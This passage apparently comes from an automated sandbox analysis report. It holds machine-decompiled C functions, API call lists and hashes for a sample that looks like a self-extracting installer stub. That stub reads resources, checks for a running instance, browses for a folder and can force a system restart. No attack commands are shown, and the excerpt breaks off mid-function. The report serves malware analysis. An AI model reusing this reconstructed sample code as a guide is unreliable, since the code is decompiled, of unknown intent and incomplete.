                                                                                                                                                                                                                                            0x010d1fc5
                                                                                                                                                                                                                                            0x010d1fcd
                                                                                                                                                                                                                                            0x010d1fdb
                                                                                                                                                                                                                                            0x010d1ee5
                                                                                                                                                                                                                                            0x010d1eea
                                                                                                                                                                                                                                            0x010d1ef1
                                                                                                                                                                                                                                            0x010d1ef4
                                                                                                                                                                                                                                            0x010d1f0c
                                                                                                                                                                                                                                            0x010d1f2e
                                                                                                                                                                                                                                            0x010d1f3a
                                                                                                                                                                                                                                            0x010d1f46
                                                                                                                                                                                                                                            0x010d1f4d
                                                                                                                                                                                                                                            0x010d1f58
                                                                                                                                                                                                                                            0x010d1f60
                                                                                                                                                                                                                                            0x010d1f61
                                                                                                                                                                                                                                            0x010d1f62
                                                                                                                                                                                                                                            0x010d1f75
                                                                                                                                                                                                                                            0x010d1f80
                                                                                                                                                                                                                                            0x010d1f77
                                                                                                                                                                                                                                            0x010d1f77
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d1f77
                                                                                                                                                                                                                                            0x010d1f64
                                                                                                                                                                                                                                            0x010d1f64
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d1f64
                                                                                                                                                                                                                                            0x010d1f0e
                                                                                                                                                                                                                                            0x010d1f0e
                                                                                                                                                                                                                                            0x010d1f13
                                                                                                                                                                                                                                            0x010d1f13
                                                                                                                                                                                                                                            0x010d1f14
                                                                                                                                                                                                                                            0x010d1f14
                                                                                                                                                                                                                                            0x010d1f16
                                                                                                                                                                                                                                            0x010d1f17
                                                                                                                                                                                                                                            0x010d1f1a
                                                                                                                                                                                                                                            0x010d1f1f
                                                                                                                                                                                                                                            0x010d1f1f
                                                                                                                                                                                                                                            0x010d1f86
                                                                                                                                                                                                                                            0x010d1f8f
                                                                                                                                                                                                                                            0x010d1fcf
                                                                                                                                                                                                                                            0x010d1fd3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d1fd3
                                                                                                                                                                                                                                            0x010d1fa9
                                                                                                                                                                                                                                            0x010d1fb4
                                                                                                                                                                                                                                            0x010d1fbb
                                                                                                                                                                                                                                            0x010d1fc3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d1fc3
                                                                                                                                                                                                                                            0x010d1f9a
                                                                                                                                                                                                                                            0x010d1f9a
                                                                                                                                                                                                                                            0x010d1fa2
                                                                                                                                                                                                                                            0x010d1fd9
                                                                                                                                                                                                                                            0x010d1fda
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d1fa2

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 010D1EFB
                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 010D1F02
                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 010D1FD3
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                            • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                            • Opcode ID: 0eaeaa5b9f4954a4819a8a180eacda5e12447abd22f1dec901bc0ccd3a868f4d
                                                                                                                                                                                                                                            • Instruction ID: b59a6de032dd9c229f4e34e3385ef1aeedafa399fab3332b1defc4892c7bed3a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0eaeaa5b9f4954a4819a8a180eacda5e12447abd22f1dec901bc0ccd3a868f4d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B02124B1B41305BBDB309AA5DC49FBF7AF8EB85B10F100098FA82E7085DF7A84408361
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D6CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                            				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                                                            				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                                                            			}



                                                                                                                                                                                                                                            0x010d6cf7
                                                                                                                                                                                                                                            0x010d6d00
                                                                                                                                                                                                                                            0x010d6d19

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,010D6E26,010D1000), ref: 010D6CF7
                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(010D6E26,?,010D6E26,010D1000), ref: 010D6D00
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409,?,010D6E26,010D1000), ref: 010D6D0B
                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,010D6E26,010D1000), ref: 010D6D12
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3231755760-0
                                                                                                                                                                                                                                            • Opcode ID: 606a5ce0b780926854fccb197424ac30f5bf9f12aa1b0f54b92ecdf0e281bc69
                                                                                                                                                                                                                                            • Instruction ID: 295ea596412ff2cb4873167e73470c175cb90cb7fcf53ba21d76227c7b83a1ba
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 606a5ce0b780926854fccb197424ac30f5bf9f12aa1b0f54b92ecdf0e281bc69
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CAD0123A201108FBDB202BF1E80CA593F28FB48393F444000FB5D83004CB3B4451CB51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E010D2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				struct HRSRC__* _t31;
                                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                                            				void* _t43;
                                                                                                                                                                                                                                            				void* _t48;
                                                                                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t13 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                                                            				_t65 = 0;
                                                                                                                                                                                                                                            				_t66 = __ecx;
                                                                                                                                                                                                                                            				_t48 = __edx;
                                                                                                                                                                                                                                            				 *0x10d9a3c = __ecx;
                                                                                                                                                                                                                                            				memset(0x10d9140, 0, 0x8fc);
                                                                                                                                                                                                                                            				memset(0x10d8a20, 0, 0x32c);
                                                                                                                                                                                                                                            				memset(0x10d88c0, 0, 0x104);
                                                                                                                                                                                                                                            				 *0x10d93ec = 1;
                                                                                                                                                                                                                                            				_t20 = E010D468F("TITLE", 0x10d9154, 0x7f);
                                                                                                                                                                                                                                            				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                                                            					_t64 = 0x4b1;
                                                                                                                                                                                                                                            					goto L32;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                                            					 *0x10d858c = _t27;
                                                                                                                                                                                                                                            					SetEvent(_t27);
                                                                                                                                                                                                                                            					_t64 = 0x10d9a34;
                                                                                                                                                                                                                                            					if(E010D468F("EXTRACTOPT", 0x10d9a34, 4) != 0) {
                                                                                                                                                                                                                                            						if(( *0x10d9a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                            							L12:
                                                                                                                                                                                                                                            							 *0x10d9120 =  *0x10d9120 & _t65;
                                                                                                                                                                                                                                            							if(E010D5C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                                                            								if( *0x10d8a3a == 0) {
                                                                                                                                                                                                                                            									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                                                            									if(_t31 != 0) {
                                                                                                                                                                                                                                            										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if( *0x10d8184 != 0) {
                                                                                                                                                                                                                                            										__imp__#17();
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if( *0x10d8a24 == 0) {
                                                                                                                                                                                                                                            										_t57 = _t65;
                                                                                                                                                                                                                                            										if(E010D36EE(_t65) == 0) {
                                                                                                                                                                                                                                            											goto L33;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t33 =  *0x10d9a40;
                                                                                                                                                                                                                                            											_t48 = 1;
                                                                                                                                                                                                                                            											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                                                            												if(( *0x10d9a34 & 0x00000100) == 0 || ( *0x10d8a38 & 0x00000001) != 0 || E010D18A3(_t64, _t66) != 0) {
                                                                                                                                                                                                                                            													goto L30;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t64 = 0x7d6;
                                                                                                                                                                                                                                            													if(E010D6517(_t57, 0x7d6, _t34, E010D19E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                                                            														goto L33;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L30;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												L30:
                                                                                                                                                                                                                                            												_t23 = _t48;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t23 = 1;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E010D2390(0x10d8a3a);
                                                                                                                                                                                                                                            									goto L33;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t64 = 0x520;
                                                                                                                                                                                                                                            								L32:
                                                                                                                                                                                                                                            								E010D44B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            								goto L33;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t64 =  &_v268;
                                                                                                                                                                                                                                            							if(E010D468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            								goto L3;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                                                            								 *0x10d8588 = _t43;
                                                                                                                                                                                                                                            								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                                                            									goto L12;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									if(( *0x10d9a34 & 0x00000080) == 0) {
                                                                                                                                                                                                                                            										_t64 = 0x524;
                                                                                                                                                                                                                                            										if(E010D44B9(0, 0x524, 0x10d9154, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                                                            											goto L12;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L11;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t64 = 0x54b;
                                                                                                                                                                                                                                            										E010D44B9(0, 0x54b, 0x10d9154, 0, 0x10, 0);
                                                                                                                                                                                                                                            										L11:
                                                                                                                                                                                                                                            										CloseHandle( *0x10d8588);
                                                                                                                                                                                                                                            										 *0x10d9124 = 0x800700b7;
                                                                                                                                                                                                                                            										goto L33;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						L3:
                                                                                                                                                                                                                                            						_t64 = 0x4b1;
                                                                                                                                                                                                                                            						E010D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						 *0x10d9124 = 0x80070714;
                                                                                                                                                                                                                                            						L33:
                                                                                                                                                                                                                                            						_t23 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E010D6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            0x010d2cb5
                                                                                                                                                                                                                                            0x010d2cbc
                                                                                                                                                                                                                                            0x010d2cc7
                                                                                                                                                                                                                                            0x010d2cc9
                                                                                                                                                                                                                                            0x010d2cd1
                                                                                                                                                                                                                                            0x010d2cd3
                                                                                                                                                                                                                                            0x010d2cd9
                                                                                                                                                                                                                                            0x010d2ce9
                                                                                                                                                                                                                                            0x010d2cf9
                                                                                                                                                                                                                                            0x010d2d0e
                                                                                                                                                                                                                                            0x010d2d15
                                                                                                                                                                                                                                            0x010d2d1c
                                                                                                                                                                                                                                            0x010d2ef3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2d2d
                                                                                                                                                                                                                                            0x010d2d34
                                                                                                                                                                                                                                            0x010d2d3b
                                                                                                                                                                                                                                            0x010d2d40
                                                                                                                                                                                                                                            0x010d2d48
                                                                                                                                                                                                                                            0x010d2d59
                                                                                                                                                                                                                                            0x010d2d84
                                                                                                                                                                                                                                            0x010d2e1f
                                                                                                                                                                                                                                            0x010d2e1f
                                                                                                                                                                                                                                            0x010d2e2e
                                                                                                                                                                                                                                            0x010d2e41
                                                                                                                                                                                                                                            0x010d2e5a
                                                                                                                                                                                                                                            0x010d2e62
                                                                                                                                                                                                                                            0x010d2e6c
                                                                                                                                                                                                                                            0x010d2e6c
                                                                                                                                                                                                                                            0x010d2e75
                                                                                                                                                                                                                                            0x010d2e77
                                                                                                                                                                                                                                            0x010d2e77
                                                                                                                                                                                                                                            0x010d2e84
                                                                                                                                                                                                                                            0x010d2e8b
                                                                                                                                                                                                                                            0x010d2e94
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2e96
                                                                                                                                                                                                                                            0x010d2e96
                                                                                                                                                                                                                                            0x010d2e9e
                                                                                                                                                                                                                                            0x010d2ea2
                                                                                                                                                                                                                                            0x010d2eba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2ece
                                                                                                                                                                                                                                            0x010d2ede
                                                                                                                                                                                                                                            0x010d2eed
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2eed
                                                                                                                                                                                                                                            0x010d2eef
                                                                                                                                                                                                                                            0x010d2eef
                                                                                                                                                                                                                                            0x010d2eef
                                                                                                                                                                                                                                            0x010d2eef
                                                                                                                                                                                                                                            0x010d2ea2
                                                                                                                                                                                                                                            0x010d2e86
                                                                                                                                                                                                                                            0x010d2e88
                                                                                                                                                                                                                                            0x010d2e88
                                                                                                                                                                                                                                            0x010d2e43
                                                                                                                                                                                                                                            0x010d2e48
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2e48
                                                                                                                                                                                                                                            0x010d2e30
                                                                                                                                                                                                                                            0x010d2e30
                                                                                                                                                                                                                                            0x010d2ef8
                                                                                                                                                                                                                                            0x010d2f01
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2f01
                                                                                                                                                                                                                                            0x010d2d8a
                                                                                                                                                                                                                                            0x010d2d8f
                                                                                                                                                                                                                                            0x010d2da1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2da3
                                                                                                                                                                                                                                            0x010d2dae
                                                                                                                                                                                                                                            0x010d2db4
                                                                                                                                                                                                                                            0x010d2dbb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2dca
                                                                                                                                                                                                                                            0x010d2dd3
                                                                                                                                                                                                                                            0x010d2df5
                                                                                                                                                                                                                                            0x010d2e02
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2dd5
                                                                                                                                                                                                                                            0x010d2dde
                                                                                                                                                                                                                                            0x010d2de3
                                                                                                                                                                                                                                            0x010d2e04
                                                                                                                                                                                                                                            0x010d2e0a
                                                                                                                                                                                                                                            0x010d2e10
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2e10
                                                                                                                                                                                                                                            0x010d2dd3
                                                                                                                                                                                                                                            0x010d2dbb
                                                                                                                                                                                                                                            0x010d2da1
                                                                                                                                                                                                                                            0x010d2d5b
                                                                                                                                                                                                                                            0x010d2d5b
                                                                                                                                                                                                                                            0x010d2d5d
                                                                                                                                                                                                                                            0x010d2d69
                                                                                                                                                                                                                                            0x010d2d6e
                                                                                                                                                                                                                                            0x010d2f06
                                                                                                                                                                                                                                            0x010d2f06
                                                                                                                                                                                                                                            0x010d2f06
                                                                                                                                                                                                                                            0x010d2d59
                                                                                                                                                                                                                                            0x010d2f18

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 010D2CD9
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 010D2CE9
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 010D2CF9
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46A0
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: SizeofResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46A9
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46C3
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: LoadResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46CC
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: LockResource.KERNEL32(00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46D3
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: memcpy_s.MSVCRT ref: 010D46E5
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46EF
                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D2D34
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 010D2D40
                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 010D2DAE
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 010D2DBD
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(010D9154,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 010D2E0A
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010D4518
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: MessageBoxA.USER32(?,?,010D9154,00010010), ref: 010D4554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK
                                                                                                                                                                                                                                            • API String ID: 1002816675-2113404272
                                                                                                                                                                                                                                            • Opcode ID: cd211f050a133d3c0b06d74603606dcbe44f4a5ddf02d523012a6113a665b5e6
                                                                                                                                                                                                                                            • Instruction ID: 580bad3d8bc054534bbc3f33c2a6629aad03abbd9d0bfe74aca4934ca9a73c1d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd211f050a133d3c0b06d74603606dcbe44f4a5ddf02d523012a6113a665b5e6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A512B70341302ABF770A679DD4AB7B3AD8EB55704F008469FEC1D61C9DBB98841C725
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                                                                                                                            			E010D4224(char __ecx) {
                                                                                                                                                                                                                                            				char* _v8;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                            				char* _v28;
                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                            				char _t42;
                                                                                                                                                                                                                                            				char* _t44;
                                                                                                                                                                                                                                            				char* _t61;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				char* _t65;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                            				char _t67;
                                                                                                                                                                                                                                            				void* _t71;
                                                                                                                                                                                                                                            				char _t76;
                                                                                                                                                                                                                                            				intOrPtr _t85;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t67 = __ecx;
                                                                                                                                                                                                                                            				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                                                            				if(_t66 == 0) {
                                                                                                                                                                                                                                            					_t63 = 0x4c2;
                                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                                            					E010D44B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                                                            				_v12 = _t26;
                                                                                                                                                                                                                                            				if(_t26 == 0) {
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					FreeLibrary(_t66);
                                                                                                                                                                                                                                            					_t63 = 0x4c1;
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                                                            				_v20 = _t28;
                                                                                                                                                                                                                                            				if(_t28 == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                                                            				_v16 = _t29;
                                                                                                                                                                                                                                            				if(_t29 == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t76 =  *0x10d88c0; // 0x0
                                                                                                                                                                                                                                            				if(_t76 != 0) {
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					 *0x10d87a0 = 0;
                                                                                                                                                                                                                                            					_v52 = _t67;
                                                                                                                                                                                                                                            					_v48 = 0;
                                                                                                                                                                                                                                            					_v44 = 0;
                                                                                                                                                                                                                                            					_v40 = 0x10d8598;
                                                                                                                                                                                                                                            					_v36 = 1;
                                                                                                                                                                                                                                            					_v32 = E010D4200;
                                                                                                                                                                                                                                            					_v28 = 0x10d88c0;
                                                                                                                                                                                                                                            					 *0x10da288( &_v52);
                                                                                                                                                                                                                                            					_t32 =  *_v12();
                                                                                                                                                                                                                                            					if(_t71 != _t71) {
                                                                                                                                                                                                                                            						asm("int 0x29");
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_v12 = _t32;
                                                                                                                                                                                                                                            					if(_t32 != 0) {
                                                                                                                                                                                                                                            						 *0x10da288(_t32, 0x10d88c0);
                                                                                                                                                                                                                                            						 *_v16();
                                                                                                                                                                                                                                            						if(_t71 != _t71) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if( *0x10d88c0 != 0) {
                                                                                                                                                                                                                                            							E010D1680(0x10d87a0, 0x104, 0x10d88c0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0x10da288(_v12);
                                                                                                                                                                                                                                            						 *_v20();
                                                                                                                                                                                                                                            						if(_t71 != _t71) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					FreeLibrary(_t66);
                                                                                                                                                                                                                                            					_t85 =  *0x10d87a0; // 0x0
                                                                                                                                                                                                                                            					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					GetTempPathA(0x104, 0x10d88c0);
                                                                                                                                                                                                                                            					_t61 = 0x10d88c0;
                                                                                                                                                                                                                                            					_t4 =  &(_t61[1]); // 0x10d88c1
                                                                                                                                                                                                                                            					_t65 = _t4;
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t42 =  *_t61;
                                                                                                                                                                                                                                            						_t61 =  &(_t61[1]);
                                                                                                                                                                                                                                            					} while (_t42 != 0);
                                                                                                                                                                                                                                            					_t5 = _t61 - _t65 + 0x10d88c0; // 0x21b1181
                                                                                                                                                                                                                                            					_t44 = CharPrevA(0x10d88c0, _t5);
                                                                                                                                                                                                                                            					_v8 = _t44;
